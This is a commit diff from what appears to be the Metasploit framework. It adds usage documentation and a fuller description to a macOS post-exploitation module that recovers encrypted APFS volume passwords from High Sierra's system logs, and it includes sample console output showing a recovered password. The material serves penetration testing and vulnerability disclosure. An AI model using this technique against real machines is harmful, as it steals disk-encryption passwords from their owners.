minor documentation and comment tweaks

rapid7 · Apr 18, 2018 · 72cd97d · 72cd97d
1 parent f54df6a
commit 72cd97d
Show file tree

Hide file tree

Showing 2 changed files with 20 additions and 5 deletions.
diff --git a/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md b/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md
@@ -25,3 +25,19 @@ This module uses a vulnerability in macOS High Sierra's `log` command. It uses t
   **MOUNT_PATH**
 
   `MOUNT_PATH` is the path on the macOS system where the encrypted drive is (or was) mounted. This is *not* the path under `/Volumes`
+
+## Scenarios
+
+  Typical run against an OSX session, after creating a new APFS disk using Disk Utility:
+
+```
+msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd
+msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1
+SESSION => -1
+msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit
+
+[+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 .
+[+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 .
+[*] Post module execution completed
+msf5 post(osx/gather/apfs_encrypted_volume_passwd) >
+```
diff --git a/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb b/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb
@@ -10,13 +10,16 @@ def initialize(info={})
       'Description'   => %q(
         This module exploits a flaw in OSX 10.13 through 10.13.3
         that discloses the passwords of encrypted APFS volumes.
+
+        In OSX a normal user can use the 'log' command to view the system
+        logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS
+        volume the password is visible in plaintext within these logs.
       ),
       'License'       => MSF_LICENSE,
       'References'    =>
         [
           [ 'URL', 'https://thehackernews.com/2018/03/macos-apfs-password.html' ],
           [ 'URL', 'https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp' ]
-
         ],
       'Platform'      => 'osx',
       'Arch'          => ARCH_ALL,
@@ -38,10 +41,6 @@ def initialize(info={})
   end
 
   def check
-    # sw_vers looks like this:
-    # ProductName: macOS
-    # ProductVersion: 10.12
-    # BuildVersion: 7A100
     osx_version = cmd_exec('sw_vers -productVersion')
     return Exploit::CheckCode::Vulnerable if osx_version =~ /^10\.13[\.[0-3]]?$/
     Exploit::CheckCode::Safe